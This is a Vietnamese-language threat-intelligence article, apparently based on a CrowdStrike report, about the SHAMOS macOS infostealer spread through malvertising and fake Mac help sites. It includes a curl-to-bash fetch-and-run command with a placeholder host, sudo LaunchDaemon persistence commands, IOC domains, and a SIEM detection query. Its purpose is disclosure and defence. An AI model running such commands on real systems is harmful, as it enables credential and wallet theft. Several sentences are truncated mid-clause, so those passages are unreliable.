Các nhà nghiên cứu an ninh mạng tại CrowdStrike đã phát hiện và ngăn chặn một chiến dịch
Tổng Quan Chiến Dịch và Mục Tiêu
Chiến dịch này đã cố gắng xâm nhập hơn 300 môi trường khách hàng. Tuy nhiên, nó đã bị nền tảng CrowdStrike Falcon chặn thành công. Điều này nhấn mạnh
Các nạn nhân đến từ nhiều quốc gia như Hoa Kỳ, Vương quốc Anh, Nhật Bản, Trung Quốc, Colombia, Canada, Mexico và Ý đã bị nhắm mục tiêu. Đáng chú ý, Nga và các quốc gia thuộc Cộng đồng các Quốc gia Độc lập đã bị loại trừ. Điều này phù hợp với các quy định trong các diễn đàn eCrime của Nga cấm tấn công người dùng trong nước.
Chiến Thuật Lan Truyền: Malvertising
Chiến dịch này dựa vào chiến thuật malvertising (quảng cáo độc hại). Các trang web trợ giúp macOS giả mạo được quảng bá trong kết quả tìm kiếm. Chúng lôi kéo người dùng đang tìm kiếm giải pháp cho các vấn đề phổ biến, ví dụ như xóa bộ nhớ cache của trình phân giải.
Malvertising đã hướng người dùng đến các trang web giả mạo, bắt chước các trang hỗ trợ macOS hợp pháp, chẳng hạn như mac-safer[.]com và rescue-mac[.]com. Các trang này cung cấp hướng dẫn sai lệch để thực thi một lệnh cài đặt một dòng độc hại trong Terminal.
Kỹ Thuật Xâm Nhập và Khai Thác SHAMOS
Cơ Chế Khai Thác Ban Đầu
Lệnh một dòng này, thường được mã hóa Base64, đã tải xuống một script Bash. Script này có chức năng thu thập mật khẩu của người dùng và tải về tệp thực thi Mach-O của
Ví dụ về lệnh được quan sát:
curl -sL [địa_chỉ_server]/payload.sh | bashHành Vi của SHAMOS Malware
Khi thực thi, /tmp/. Tại đây, nó loại bỏ các thuộc tính tệp mở rộng bằng lệnh xattr để trốn tránh phát hiện, gán quyền thực thi thông qua chmod và chạy các kiểm tra chống máy ảo (anti-VM) để tránh môi trường sandbox.
Sau đó, nó sử dụng AppleScript để thực hiện do thám, quét các tệp ví tiền điện tử, dữ liệu Keychain, Apple Notes và thông tin đăng nhập trình duyệt. Dữ liệu thu thập được sẽ được nén vào một tệp ZIP có tên out.zip và được xuất qua các lệnh curl tới các máy chủ do kẻ tấn công kiểm soát.
Các payload tiếp theo, bao gồm một ứng dụng ví Ledger Live giả mạo và một mô-đun botnet, được triển khai dưới dạng các tệp ẩn trong thư mục chính của người dùng.
Cơ Chế Duy Trì Quyền Truy Cập (Persistence)
Nếu có quyền sudo, com.finder.helper.plist) trong thư mục LaunchDaemons. Điều này đảm bảo quyền truy cập lâu dài cho kẻ tấn công.
sudo cp /tmp/com.finder.helper.plist /Library/LaunchDaemons/com.finder.helper.plist
sudo launchctl load /Library/LaunchDaemons/com.finder.helper.plistCác quan sát của CrowdStrike ghi nhận nhiều lệnh gọi curl cho thấy hoạt động của botnet, nhấn mạnh thiết kế mô-đun của mã độc này để kéo dài sự xâm nhập. Xem thêm chi tiết tại CrowdStrike Blog.
Chỉ Số Thỏa Hiệp (IOCs)
Các chỉ số thỏa hiệp liên quan đến chiến dịch
- Tên miền độc hại (Malicious Domains):
mac-safer[.]comrescue-mac[.]commacostutorial[.]com
- Tên tệp và đường dẫn:
/tmp/SHAMOS_executable/tmp/out.zip/Library/LaunchDaemons/com.finder.helper.plist
- Hành vi CLI/Kịch bản:
- Thực thi Bash script từ URL bên ngoài.
- Sử dụng lệnh
xattr -cđể xóa thuộc tính mở rộng. - Sử dụng lệnh
chmod +xđể gán quyền thực thi. - Sử dụng
curlđể tải xuống và xuất dữ liệu. - Sử dụng AppleScript để do thám hệ thống.
- Tạo tệp Plist để duy trì quyền truy cập.
Các Chiến Dịch Tương Tự và Xu Hướng
Các chiến thuật tương tự đã được quan sát trong các chiến dịch trước đây liên quan đến Cuckoo Stealer và các biến thể
Các báo cáo mã nguồn mở đã xác nhận những phát hiện này, chi tiết về một chiến dịch liên quan thông qua một kho lưu trữ GitHub giả mạo iTerm2, một trình giả lập terminal macOS phổ biến. Kho lưu trữ này hướng dẫn người dùng chạy một lệnh một dòng tương tự, tải macostutorial[.]com. Điều này cho thấy sự ưa thích của các tác nhân trong việc kết hợp kỹ thuật xã hội với kỹ thuật né tránh.
CrowdStrike đánh giá với độ tin cậy cao rằng các tác nhân eCrime sẽ kiên trì sử dụng malvertising và các lệnh cài đặt một dòng để phân phối mã độc đánh cắp thông tin trên macOS. Điều này dựa trên hiệu quả đã được chứng minh của chúng trong việc bỏ qua Gatekeeper và thu hút lưu lượng nạn nhân.
Biện Pháp Phòng Chống và Phát Hiện Bảo Mật Mạng
Nền tảng Falcon của CrowdStrike với khả năng học máy và chỉ số tấn công (IOAs) cung cấp khả năng phát hiện đa lớp, ngăn chặn
Để bảo vệ hệ thống, người dùng nên kích hoạt tính năng ngăn chặn tiến trình đáng ngờ (suspicious process prevention) và ngăn chặn mối đe dọa từ thông tin tình báo (intelligence-sourced threat prevention) trong các chính sách Falcon Insight XDR.
Các nhà săn lùng mối đe dọa có thể sử dụng các truy vấn Falcon Next-Gen SIEM để phát hiện các hành vi rủi ro, chẳng hạn như các script Bash gọi dscl, curl, xattr và chmod, hoặc các thực thi AppleScript từ các tệp nhị phân trong thư mục /tmp/.
# Ví dụ truy vấn SIEM để phát hiện hành vi đáng ngờ
Event_SimpleName=ProcessRollup2
FileName IN ("bash", "zsh", "sh")
CommandLine CONTAINS "curl" AND CommandLine CONTAINS "| bash"
| OR
FileName="xattr" AND CommandLine CONTAINS "-c"
| OR
FileName="chmod" AND CommandLine CONTAINS "+x"
| OR
ParentFileName IN ("bash", "zsh", "sh", "osascript") AND FileName IN ("dscl", "curl", "xattr", "chmod")
| OR
ParentFileName="osascript" AND CommandLine CONTAINS "/tmp/" AND CommandLine ENDS WITH ".app"
